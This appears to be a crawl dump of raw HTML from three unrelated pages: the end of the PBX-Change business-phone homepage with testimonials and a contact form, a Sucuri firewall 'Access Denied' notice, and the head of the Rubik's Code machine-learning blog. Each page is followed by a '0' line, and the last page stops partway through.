.fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-4{background: #ffb645;}.fusion-button.button-4:hover,.button-4:focus,.fusion-button.button-4:active{background: #ff9900;}.fusion-button.button-4{width:auto;}</style><a class="fusion-button button-flat fusion-button-square button-large button-custom button-4" target="_blank" rel="noopener noreferrer" href="/pbx-build-me-solution"><span class="fusion-button-text">Read More</span></a></div> </div></div></div></div></div></div><div class="fusion-clearfix"></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:30px;padding-bottom:0px;padding-left:30px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-3 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-title title fusion-title-3 fusion-title-size-one" style="margin-top:0px;margin-bottom:31px;"><h1 class="title-heading-left" style="margin:0;">SATISFIED CLIENTS</h1><div class="title-sep-container"><div class="title-sep sep-double sep-solid" style="border-color:#e0dede;"></div></div></div><div class="fusion-testimonials clean fusion-testimonials-1" data-random="0" data-speed="4000"><style type="text/css" scoped="scoped">#fusion-testimonials-1 a{border-color:#3a3a3a;}#fusion-testimonials-1 a:hover, #fusion-testimonials-1 .activeSlide{background-color: #3a3a3a;}.fusion-testimonials.clean.fusion-testimonials-1 .author:after{border-top-color:#fcfcfc !important;}</style><div class="reviews"><div class="review avatar-image"><div class="testimonial-thumbnail"><img class="testimonial-image" src="/wp-content/uploads/2017/08/Coleman-Klymenko.png" /></div><blockquote style="background-color:#fcfcfc;"><q style="background-color:#fcfcfc;color:#3a3a3a;" class="fusion-clearfix"> <p>The single bundled cost of phone, internet and facsimile at a cost lower than major providers such as Brighthouse/Spectrum, Verizon and others, in conjunction with local PBX service and customer representatives that we know on a first name basis.</p> </q></blockquote><div class="author" style="color:#3a3a3a;"><span class="company-name"><strong>Andrew Klymenko</strong>, <span>Coleman &amp; Klymenko, LLC Attorneys At Law</span></span></div></div><div class="review avatar-image"><div class="testimonial-thumbnail"><img class="testimonial-image" src="/wp-content/uploads/2017/08/Quality-Roofing-Inc.png" /></div><blockquote style="background-color:#fcfcfc;"><q style="background-color:#fcfcfc;color:#3a3a3a;" class="fusion-clearfix"> <p>PBX-Change customer for just over a year, and have been very satisfied with the company’s knowledge, equipment and resources they make available. The transition was quick and easy.</p> </q></blockquote><div class="author" style="color:#3a3a3a;"><span class="company-name"><strong>John Castellana</strong>, <span>Quality Roofing Inc </span></span></div></div><div class="review avatar-image"><div class="testimonial-thumbnail"><img class="testimonial-image" src="/wp-content/uploads/2017/08/servicemaster-logo.png" /></div><blockquote style="background-color:#fcfcfc;"><q style="background-color:#fcfcfc;color:#3a3a3a;" class="fusion-clearfix"> <p>PBX is hands down the best around, they are a pleasure to work with and provide excellent service to help our business run in a smooth efficient manner.</p> </q></blockquote><div class="author" style="color:#3a3a3a;"><span class="company-name"><strong>M Wolf</strong>, <span>Service Master Tampa Bay</span></span></div></div><div class="review avatar-image"><div class="testimonial-thumbnail"><img class="testimonial-image" src="/wp-content/uploads/2018/03/unnamed.jpg" /></div><blockquote style="background-color:#fcfcfc;"><q style="background-color:#fcfcfc;color:#3a3a3a;" class="fusion-clearfix"> <p>PBX-Change offers dependable reliable service at a fair price. Their support is there when you need them to resolve issues timely.</p> </q></blockquote><div class="author" style="color:#3a3a3a;"><span class="company-name"><strong>Joe Del Rosal</strong>, <span>olivacigar.com</span></span></div></div><div class="review avatar-image"><div class="testimonial-thumbnail"><img class="testimonial-image" src="/wp-content/uploads/2018/04/GPBR-Logo-1.png" /></div><blockquote style="background-color:#fcfcfc;"><q style="background-color:#fcfcfc;color:#3a3a3a;" class="fusion-clearfix"> <p>PBX-Change has given us six years of exceptional service, with unparalleled support. Back then, we were afraid that the transition would be a hassle, but the team made it seamless and trained our employees well. We highly recommend PBX-Change for all of your business communication needs.</p> </q></blockquote><div class="author" style="color:#3a3a3a;"><span class="company-name"><strong>Dave Perez</strong>, <span> Director of Operations, Gene Perez Body Repairs, Inc.</span></span></div></div><div class="review avatar-image"><div class="testimonial-thumbnail"><img class="testimonial-image" src="/wp-content/uploads/2018/06/unnamed.png" /></div><blockquote style="background-color:#fcfcfc;"><q style="background-color:#fcfcfc;color:#3a3a3a;" class="fusion-clearfix"> <p>&#8230;wanted to reach out and say thank you for such a smooth install.   The technicians were all a pleasure to work with and we are enjoying our new phone system.  It’s wonderful to be able to refer out a company that meets your expectations.</p> </q></blockquote><div class="author" style="color:#3a3a3a;"><span class="company-name"><strong>Tara Moody</strong>, <span>Synergy Technology Solutions</span></span></div></div></div><div class="testimonial-pagination" id="fusion-testimonials-1"></div></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box fusion-parallax-none nonhundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-image: url("/wp-content/uploads/2017/08/Screenshot_14.png");background-position: center center;background-repeat: repeat;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-4 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-builder-row fusion-builder-row-inner fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-first 1_2" style='margin-top: 0px;margin-bottom: 20px;width:50%;width:calc(50% - ( ( 4% ) * 0.5 ) );margin-right:4%;'><div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""><div class="fusion-sep-clear"></div><div class="fusion-separator fusion-full-width-sep sep-none" style="margin-left: auto;margin-right: auto;margin-top:35px;margin-bottom:35px;"></div><div class="fusion-text"><h2 style="margin-bottom: 8px;"><span style="color: #ffffff;">More Than 20 Years of Experience &amp; Trust</span></h2> <p><span style="color: #ffffff;">PBX-Change easily and seamlessly connects employees, customers and applications to improve business performance for enterprises across the US. Results-driven companies rely on the PBX-Change Communications Cloud to reduce complexity and cost, improve individual and team productivity and performance, and enhance the overall customer experience.</span></p> </div><span style="margin-right:25px;float:left;" class="fusion-imageframe imageframe-none imageframe-1 hover-type-none"><a class="fusion-no-lightbox" href="https://www.bbb.org/us/fl/tampa/profile/voice-over-internet-protocol-sales-and-service/pbx-change-0653-90213819" target="_blank" aria-label="20-years-image-trans" rel="noopener noreferrer"><img src="/wp-content/uploads/2017/08/20-years-image-trans.png" width="" height="" alt="" class="img-responsive wp-image-866" srcset="https://www.pbx-change.com/wp-content/uploads/2017/08/20-years-image-trans-200x61.png 200w, https://www.pbx-change.com/wp-content/uploads/2017/08/20-years-image-trans.png 275w" sizes="(max-width: 800px) 100vw, 275px" /></a></span></div></div><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-last 1_2" style='margin-top: 0px;margin-bottom: 20px;width:50%;width:calc(50% - ( ( 4% ) * 0.5 ) );'><div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""><div class="fusion-sep-clear"></div><div class="fusion-separator fusion-full-width-sep sep-none" style="margin-left: auto;margin-right: auto;margin-top:10px;margin-bottom:10px;"></div><div class="imageframe-align-center"><span class="fusion-imageframe imageframe-none imageframe-2 hover-type-none"><img src="/wp-content/uploads/2018/02/PBX-Change-20-Years-of-Experience.png" width="" height="" alt="" title="PBX-Change-20-Years-of-Experience" class="img-responsive wp-image-1082" srcset="https://www.pbx-change.com/wp-content/uploads/2018/02/PBX-Change-20-Years-of-Experience-200x160.png 200w, https://www.pbx-change.com/wp-content/uploads/2018/02/PBX-Change-20-Years-of-Experience-400x320.png 400w, https://www.pbx-change.com/wp-content/uploads/2018/02/PBX-Change-20-Years-of-Experience.png 407w" sizes="(max-width: 800px) 100vw, 407px" /></span></div></div></div></div><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling fusion-equal-height-columns" style='background-color: #ffffff;background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_6 fusion-builder-column-5 fusion-one-sixth fusion-column-first fusion-spacing-no 1_6" style='margin-top:0px;margin-bottom:0px;width:16.66%;width:calc(16.66% - ( ( 0% + 0% ) * 0.1666 ) );margin-right: 0%;'> <div class="fusion-column-wrapper" style="padding: 30px 30px 30px 30px;background-image: url('/wp-content/uploads/2017/08/gallery-3a.jpg');background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url="/wp-content/uploads/2017/08/gallery-3a.jpg"> <div class="fusion-clearfix"></div> </div> </div><div class="fusion-layout-column fusion_builder_column fusion_builder_column_2_3 fusion-builder-column-6 fusion-two-third fusion-spacing-no 2_3" style='margin-top:0px;margin-bottom:0px;width:66.66%;width:calc(66.66% - ( ( 0% + 0% ) * 0.6666 ) );margin-right: 0%;'> <div class="fusion-column-wrapper" style="padding: 30px 30px 30px 30px;background-image: url('/wp-content/uploads/2017/08/gallery-3a.jpg');background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url="/wp-content/uploads/2017/08/gallery-3a.jpg"> <div class="fusion-sep-clear"></div><div class="fusion-separator fusion-full-width-sep sep-none" style="margin-left: auto;margin-right: auto;margin-top:20px;margin-bottom:20px;"></div><div class="fusion-title title fusion-title-4 fusion-sep-none fusion-title-center fusion-title-size-one" style="margin-top:0px;margin-bottom:31px;"><h1 class="title-heading-center" style="margin:0;"><span style="color: #ffffff;">Contact US</span></h1></div><div class="fusion-text"><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_2 fusion-one-half fusion-column-first 1_2"></div> <div class='gf_browser_unknown gform_wrapper' id='gform_wrapper_1' ><form method='post' enctype='multipart/form-data' id='gform_1' action='/'> <div class='gform_body'><ul id='gform_fields_1' class='gform_fields top_label form_sublabel_below description_below'><li id='field_1_1' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_1' >Full Name<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_text'><input name='input_1' id='input_1_1' type='text' value='' class='medium' placeholder='Full Name' aria-required="true" aria-invalid="false" /></div></li><li id='field_1_2' class='gfield field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_2' >Company Name</label><div class='ginput_container ginput_container_text'><input name='input_2' id='input_1_2' type='text' value='' class='medium' placeholder='Company Name' aria-invalid="false" /></div></li><li id='field_1_3' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_3' >Your Email<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_email'> <input name='input_3' id='input_1_3' type='text' value='' class='medium' placeholder='Your Email' aria-required="true" aria-invalid="false" /> </div></li><li id='field_1_4' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_4' >Phone<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_phone'><input name='input_4' id='input_1_4' type='text' value='' class='medium' placeholder='Phone Number' aria-required="true" aria-invalid="false" /></div></li><li id='field_1_5' class='gfield field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_5' >Your Message</label><div class='ginput_container ginput_container_textarea'><textarea name='input_5' id='input_1_5' class='textarea medium' placeholder='Your Message' aria-invalid="false" rows='10' cols='50'></textarea></div></li><li id='field_1_6' class='gfield field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_6' >CAPTCHA</label><div id='input_1_6' class='ginput_container ginput_recaptcha' data-sitekey='6LeVZ1AUAAAAAB33g7cGb7NJN5yggLXfpGmyA4X5' data-theme='light' data-tabindex='0' data-badge=''></div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_1' class='gform_button button' value='Submit' tabindex='1' onclick='if(window["gf_submitting_1"]){return false;} window["gf_submitting_1"]=true; ' onkeypress='if( event.keyCode == 13 ){ if(window["gf_submitting_1"]){return false;} window["gf_submitting_1"]=true; jQuery("#gform_1").trigger("submit",[true]); }' /> <input type='hidden' class='gform_hidden' name='is_submit_1' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='1' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_1' value='WyJbXSIsIjg3Nzg0YWEwOTY1OTQ1MTdiMThhNjM2ZWMzNDA3ZjEyIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_1' id='gform_target_page_number_1' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_1' id='gform_source_page_number_1' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div><script type='text/javascript'> jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 1) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }jQuery('#input_1_4').mask('(999) 999-9999').bind('keypress', function(e){if(e.which == 13){jQuery(this).blur();} } );} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [1, 1]) } ); </script> </div><div class="fusion-clearfix"></div> </div> </div><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_6 fusion-builder-column-7 fusion-one-sixth fusion-column-last fusion-spacing-no 1_6" style='margin-top:0px;margin-bottom:0px;width:16.66%;width:calc(16.66% - ( ( 0% + 0% ) * 0.1666 ) );'> <div class="fusion-column-wrapper" style="padding: 30px 30px 30px 30px;background-image: url('/wp-content/uploads/2017/08/gallery-3a.jpg');background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url="/wp-content/uploads/2017/08/gallery-3a.jpg"> <div class="fusion-clearfix"></div> </div> </div></div></div> </div> </div> </section> </div> <!-- fusion-row --> </main> <!-- #main --> <div class="fusion-footer"> <footer class="fusion-footer-widget-area fusion-widget-area"> <div class="fusion-row"> <div class="fusion-columns fusion-columns-4 fusion-widget-area"> <div class="fusion-column col-lg-3 col-md-3 col-sm-3"> <section id="nav_menu-6" class="fusion-footer-widget-column widget widget_nav_menu"><h4 class="widget-title">Useful Links</h4><div class="menu-company-container"><ul id="menu-company" class="menu"><li id="menu-item-726" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-726"><a href="https://www.pbx-change.com/about-5/">About</a></li> <li id="menu-item-727" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-727"><a href="https://www.pbx-change.com/contact-us/">Contact Us</a></li> <li id="menu-item-728" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-728"><a href="https://www.pbx-change.com/solutions/">Solutions</a></li> <li id="menu-item-732" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-732"><a href="https://www.pbx-change.com/our-network/">Our Network</a></li> </ul></div><div style="clear:both;"></div></section> </div> <div class="fusion-column col-lg-3 col-md-3 col-sm-3"> <section id="text-13" class="fusion-footer-widget-column widget widget_text"><h4 class="widget-title">Contact Info</h4> <div class="textwidget"><p><a id="global-phone" href="tel:(813) 734-8994">Sales: (813) 734-8994</a> <a href="mailto:[email protected] ">[email protected] </a><br /> <a href="tel:(866) 400-8585">Support: (866) 400-8585</a><br /> <a href="mailto:[email protected] ">[email protected] </a></p> </div> <div style="clear:both;"></div></section> </div> <div class="fusion-column col-lg-3 col-md-3 col-sm-3"> <section id="text-12" class="fusion-footer-widget-column widget widget_text"><h4 class="widget-title">Location</h4> <div class="textwidget"><p style="text-align: left;"><span style="font-size: 12pt; color: #fff;"> <strong>PBX-Change</strong></span><br /> <span style="font-size: 12pt; color: #fff;">5625 W Waters Avenue Suite E</span><br /> <span style="font-size: 12pt; color: #fff;"> Tampa, FL 33634</span></p> <p>&nbsp;</p> <p>&nbsp;</p> </div> <div style="clear:both;"></div></section> </div> <div class="fusion-column fusion-column-last col-lg-3 col-md-3 col-sm-3"> <section id="recent-posts-3" class="fusion-footer-widget-column widget widget_recent_entries"> <h4 class="widget-title">Recent Post</h4> <ul> <li> <a href="https://www.pbx-change.com/press-release-tampa-bay-fiber-provides-downtown-tampa-5g-wireless-services/">PRESS RELEASE: Tampa Bay Fiber Provides Downtown Tampa with 5G Wireless Services</a> </li> <li> <a href="https://www.pbx-change.com/tampa-bay-fiber-brings-high-speed-internet-steam-day-macdill-air-force-base/">PRESS RELEASE: Tampa Bay Fiber Brings High-Speed Internet to STEAM DAY at MacDill Air Force Base</a> </li> <li> <a href="https://www.pbx-change.com/cloud-can-improve-business-communications/">Top 3 Ways the Cloud Can Improve Your Business Communications</a> </li> </ul> <div style="clear:both;"></div></section> </div> <div class="fusion-clearfix"></div> </div> <!-- fusion-columns --> </div> <!-- fusion-row --> </footer> <!-- fusion-footer-widget-area --> <footer id="footer" class="fusion-footer-copyright-area"> <div class="fusion-row"> <div class="fusion-copyright-content"> <div class="fusion-copyright-notice"> <div> <a href="/privacy-policy/">Privacy Policy</a> <br/> ©Copyright 2018 PBX-Change </div> </div> <div class="fusion-social-links-footer"> <div class="fusion-social-networks"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-instagram fusion-icon-instagram" style="color:#ffffff;" href="http://instagram.com/PBX_change" target="_blank" rel="noopener noreferrer" data-placement="top" data-title="Instagram" data-toggle="tooltip" title="Instagram"><span class="screen-reader-text">Instagram</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-twitter fusion-icon-twitter" style="color:#ffffff;" href="https://twitter.com/PBX_Change" target="_blank" rel="noopener noreferrer" data-placement="top" data-title="Twitter" data-toggle="tooltip" title="Twitter"><span class="screen-reader-text">Twitter</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-googleplus fusion-icon-googleplus" style="color:#ffffff;" href="https://plus.google.com/b/108011028230174272745/+Pbx-change?hl=en" target="_blank" rel="noopener noreferrer" data-placement="top" data-title="Google+" data-toggle="tooltip" title="Google+"><span class="screen-reader-text">Google+</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-facebook fusion-icon-facebook" style="color:#ffffff;" href="https://www.facebook.com/PBX-Change-Inc-244843757852/" target="_blank" rel="noopener noreferrer" data-placement="top" data-title="Facebook" data-toggle="tooltip" title="Facebook"><span class="screen-reader-text">Facebook</span></a></div></div></div> </div> <!-- fusion-fusion-copyright-content --> </div> <!-- fusion-row --> </footer> <!-- #footer --> </div> <!-- fusion-footer --> </div> <!-- wrapper --> <a class="fusion-one-page-text-link fusion-page-load-link"></a> <!-- Head & Footer Code: Site-wide FOOTER section start (type: page; bahavior: append; priority: 10; do_shortcode: n) --> <script> window.fcWidget.init({ token: "9521eca5-04fb-441f-ae7d-1cd4c66679b4", host: "https://wchat.freshchat.com" }); </script> <!-- Head & Footer Code: Site-wide FOOTER section end (type: page; bahavior: append; priority: 10; do_shortcode: n) --> <script type="text/javascript"> jQuery('document').ready(function($){ $('[title]').removeAttr('title'); }); </script> <script src="//assets.pcrl.co/js/jstracker.min.js"></script> <!--Start Lead Call Buttons--> <div class='main_buttons' id='lcb_main_area'> <div class="callnow_area on one-half lcb_call_now_area" id=&quot;lcb_call_now_area&quot;> <a href="tel:(813) 734-8994"> <div class="callnow_bottom"> <span class="b_callnow"> <i class="fa fa-phone"></i> Call Now </span> </div> </a> </div> <div class="schedule_area on one-half lcb_send_email_area" id=&quot;lcb_send_email_area&quot;> <a href="mailto:[email protected] "> <div class="schedule_bottom"> <span class="b_schedule"> <i class="fa fa-envelope"></i> Send Email </span> </div> </a> </div> </div> <style> @media (max-width: 790px) { body { margin-bottom: 104px; } } body .main_buttons { background: #1176bc; color: #ffffff; } body .main_buttons .on:last-child { border-left: 1px solid #666; } .main_buttons .on a { color: #ffffff; } </style> <!--End Lead Call Buttons--> <script type="text/javascript"> jQuery( document ).ready( function() { var ajaxurl = 'https://www.pbx-change.com/wp-admin/admin-ajax.php'; if ( 0 < jQuery( '.fusion-login-nonce' ).length ) { jQuery.get( ajaxurl, { 'action': 'fusion_login_nonce' }, function( response ) { jQuery( '.fusion-login-nonce' ).html( response ); }); } }); </script> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.pbx-change.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.pbx-change.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.pbx-change.com/wp-content/uploads/fusion-scripts/a65c414191cf47e4d9dfe0f9e41da8dd.min.js'></script> <script type='text/javascript' src='https://www.pbx-change.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?hl=en&#038;render=explicit&#038;ver=5.1.1'></script> <script type="text/javascript"> ( function( $ ) { $( document ).bind( 'gform_post_render', function() { var gfRecaptchaPoller = setInterval( function() { if( ! window.grecaptcha || ! window.grecaptcha.render ) { return; } renderRecaptcha(); clearInterval( gfRecaptchaPoller ); }, 100 ); } ); } )( jQuery ); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="stylesheet" href="https://cdn.sucuri.net/sucuri-firewall-block.css" /> <section class="center clearfix"> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Sucuri WebSite Firewall - Access Denied</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700" rel="stylesheet" type="text/css"> </head> <body> <div id="main-container"> <header class="app-header clearfix"> <div class="wrap"> <a href="https://www.sucuri.net/?utm_source=firewall_block" class="logo"></a> <span class="logo-neartext">Website Firewall</span> <a href="https://sucuri.net/?utm_source=firewall_block" class="site-link">Back to sucuri.net</a> </div> </header> <section class="app-content access-denied clearfix"><div class="box center width-max-940"><h1 class="brand-font font-size-xtra no-margin"><i class="icon-circle-red"></i>Access Denied - Sucuri Website Firewall</h1> <p class="medium-text code-snippet">If you are the site owner (or you manage this site), please whitelist your IP or if you think this block is an error please <a href="https://support.sucuri.net/?utm_source=firewall_block" class="color-green underline">open a support ticket</a> and make sure to include the block details (displayed in the box below), so we can assist you in troubleshooting the issue. </p><h2>Block details:</h1> <table class="property-table overflow-break-all line-height-16"> <tr> <td>Your IP:</td> <td><span>76.119.231.70</span></td> </tr> <tr><td>URL:</td> <td><span>www.tagpay.com/</span></td> </tr> <tr> <td>Your Browser: </td> <td><span>python-requests/2.18.4</span></td> </tr> <tr><td>Block ID:</td> <td><span>BNP005</span></td> </tr> <tr> <td>Block reason:</td> <td><span>Bad bot access attempt.</span></td> </tr> <tr> <td>Time:</td> <td><span>2019-05-16 12:32:54</span></td> </tr> <tr> <td>Server ID:</td> <td><span>14010</span></td></tr> </table> </div> </section> <footer> <span>&copy; 2019 Sucuri Inc. All rights reserved.</span> <span id="privacy-policy"><a href="https://sucuri.net/privacy-policy?utm_source=firewall_block" target="_blank" rel="nofollow noopener">Privacy</a></span> </footer> </div> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Rubik&#039;s Code | Machine Learning Without Tears</title> <!-- Start The SEO Framework by Sybre Waaijer --> <meta name="description" content="Machine Learning Without Tears on Rubik&#8217;s Code&#8230;" /> <meta property="og:image" content="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=488%2C488&#038;ssl=1" /> <meta property="og:image:width" content="488" /> <meta property="og:image:height" content="488" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Rubik&#039;s Code | Machine Learning Without Tears" /> <meta property="og:description" content="Machine Learning Without Tears on Rubik&#8217;s Code&#8230;" /> <meta property="og:url" content="https://rubikscode.net/" /> <meta property="og:site_name" content="Rubik&#039;s Code" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content="Rubik&#039;s Code | Machine Learning Without Tears" /> <meta name="twitter:description" content="Machine Learning Without Tears on Rubik&#8217;s Code&#8230;" /> <meta name="twitter:image" content="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=488%2C488&#038;ssl=1" /> <meta name="twitter:image:width" content="488" /> <meta name="twitter:image:height" content="488" /> <link rel="canonical" href="https://rubikscode.net/" /> <link rel="next" href="https://rubikscode.net/page/2/" /> <script type="application/ld+json">{"@context":"https://schema.org","@type":"WebSite","url":"https://rubikscode.net/","name":"Rubik&#039;s Code","potentialAction":{"@type":"SearchAction","target":"https://rubikscode.net/search/{search_term_string}","query-input":"required name=search_term_string"}}</script> <script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","url":"https://rubikscode.net/","name":"Rubik&#039;s Code","logo":"https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=488%2C488&ssl=1"}</script> <!-- End The SEO Framework by Sybre Waaijer | 0.00312s --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Rubik&#039;s Code &raquo; Feed" href="https://rubikscode.net/feed/" /> <link rel="alternate" type="application/rss+xml" title="Rubik&#039;s Code &raquo; Comments Feed" href="https://rubikscode.net/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-100765670-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-100765670-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/rubikscode.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var 